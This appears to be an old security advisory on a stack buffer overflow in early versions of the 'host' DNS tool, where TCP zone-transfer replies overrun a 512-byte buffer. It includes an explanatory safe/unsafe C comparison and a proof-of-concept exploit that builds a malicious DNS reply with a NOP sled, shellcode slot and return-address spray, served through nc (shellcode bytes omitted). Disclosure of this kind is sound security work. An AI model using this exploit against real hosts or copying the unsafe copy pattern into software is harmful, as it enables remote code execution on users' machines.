
Host (old versions) Exploitable Buffer Overflow





    'antirez' found the following.  Old versions of the 'host' command
    contain an exploitable buffer overflow.  The affected version is
    the following:

        static char rcsid[] = "$Id: host.c,v 8.21 1998/03/19 19:31:25 halley Exp $";

    Maybe some  newer version  (but not  the current),  probably older

    The host command can be used to perform an AXFR request to obtain
    a zone transfer for a domain.  UDP DNS messages are limited to 512
    bytes, TCP DNS messages to 65535 bytes.  Vulnerable versions of the
    host command perform the AXFR query over TCP but write the received
    data to a stack-allocated buffer of 512 bytes.  If the server sends
    a message bigger than 512 bytes, the return address of the function
    can be overwritten.  This can be reproduced using the host command
    with the syntax and the proof-of-concept exploit attached below.
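    The receive-side mismatch described above, as an added example that is
    not part of the original advisory or of host's own source: a TCP DNS
    message carries a 2-byte big-endian length prefix that may declare up
    to 65535 bytes, while the old host copied the message into a 512-byte
    stack buffer.  The "unsafe" reader is a hypothetical reconstruction
    shown for contrast only; the hardened reader refuses any message whose
    declared length exceeds the destination or the bytes actually received.
    All function names and the sample message are assumptions.

```c
#include <stddef.h>
#include <string.h>

#define DNS_UDP_MAX 512     /* size of the stack buffer the old host used */
#define DNS_TCP_MAX 65535   /* largest length a TCP DNS prefix can declare */

/* Decode the 2-byte big-endian length prefix that precedes every TCP DNS message. */
size_t dns_tcp_len(const unsigned char *prefix)
{
    return ((size_t)prefix[0] << 8) | prefix[1];
}

/* Vulnerable pattern (hypothetical, modelled on the bug described above):
 * trusts the server-supplied length and copies it into a UDP-sized stack
 * buffer. Shown only for contrast; never call it with len > DNS_UDP_MAX. */
int read_axfr_unsafe(const unsigned char *stream)
{
    char answer[DNS_UDP_MAX];
    size_t len = dns_tcp_len(stream);
    memcpy(answer, stream + 2, len);   /* len may be anything up to DNS_TCP_MAX */
    return (int)len;
}

/* Hardened reader: copy only when the declared length fits the destination
 * and the bytes were actually received; return -1 otherwise. */
int read_axfr_safe(const unsigned char *stream, size_t stream_len,
                   unsigned char *out, size_t out_cap)
{
    if (stream_len < 2) return -1;         /* no complete length prefix */
    size_t len = dns_tcp_len(stream);
    if (len > out_cap) return -1;          /* would overflow the caller's buffer */
    if (len > stream_len - 2) return -1;   /* prefix claims more than arrived */
    memcpy(out, stream + 2, len);
    return (int)len;
}

/* Constructed sample: a message whose prefix declares `len` bytes of 'A',
 * delivered to a UDP-sized destination just like the old host's buffer. */
int demo_read(size_t len)
{
    unsigned char stream[2 + DNS_TCP_MAX];
    unsigned char out[DNS_UDP_MAX];
    stream[0] = (unsigned char)(len >> 8);      /* network byte order */
    stream[1] = (unsigned char)(len & 0xff);
    memset(stream + 2, 'A', len);
    return read_axfr_safe(stream, 2 + len, out, sizeof out);
}
```

    demo_read(1024), the size the proof of concept's htons(1024) prefix
    declares, returns -1 instead of overrunning the 512-byte destination.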

    Proof-of-concept exploit:

    /* hostexp.c
     * cc hostexp.c -o hostexp
     * usage: ./hostexp | nc -l -p 53
     * ./host -l -v -t any <fake server>
     */
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <netinet/in.h>

    int main(void)
    {
        int offset = 140;
        unsigned int base = 0xbffff74c+offset, i;
        char shellcode[48] = {0}; /* 48 bytes, ripped; the payload bytes are not reproduced on this page */
        unsigned short a = htons(1024); /* TCP DNS length prefix: a 1024-byte message */
        char buffer[1026];

        memcpy(buffer, &a, 2);
        memset(buffer+2, 'A', 100); /* avoid response processing */
        memset(buffer+102, 0x90, 100); /* NOP sled */
        memcpy(buffer+202, shellcode, 48);
        for (i = 202+48; i < 202+48+600; i+=4) /* repeat the guessed return address */
            memcpy(buffer+i, &base, 4);
        write(fileno(stdout), buffer, 1026);
        return 0;
    }


    The latest version is bug free.
